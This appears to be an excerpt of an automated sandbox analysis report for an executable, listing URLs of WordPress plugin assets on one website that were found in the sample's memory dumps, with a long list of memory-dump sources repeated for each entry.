              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.15.3
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=4.10
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/regular.min.css?ver=
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/swiper/v8/css/swiper.min.css?ver=8.4.
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-blocks/assets/js/jet-blocks.min.js?ver=1.3.7
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements-skin.css?ver=2.6.12
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/css/jet-elements.css?ver=2.6.12
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/jet-elements.min.js?ver=2.6.12
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/jet-elements/assets/js/lib/slick/slick.min.js?ver=1.8.1
              Source: OWd39WUX3D.exe, 00000000.00000003.581185679.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481822979.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.429859818.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.583294890.0000000003470000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.587509514.0000000000A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.427481646.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.584404616.0000000003230000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.453116288.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.433507838.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.557451003.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.481925757.0000000003530000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.554341024.0000000003550000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.534931678.0000000004610000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.458776196.00000000034A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.456317870.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.581296934.0000000003350000.00000004.00001000.00020000.00000000.sdmp, OWd39WUX3D.exe, 00000000.00000003.577763263.0000000003430000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.com-sit.com/wp-content/plugins/mailpoet/assets/dist/css/mailpoet-public.b0bd1395.css?ver=
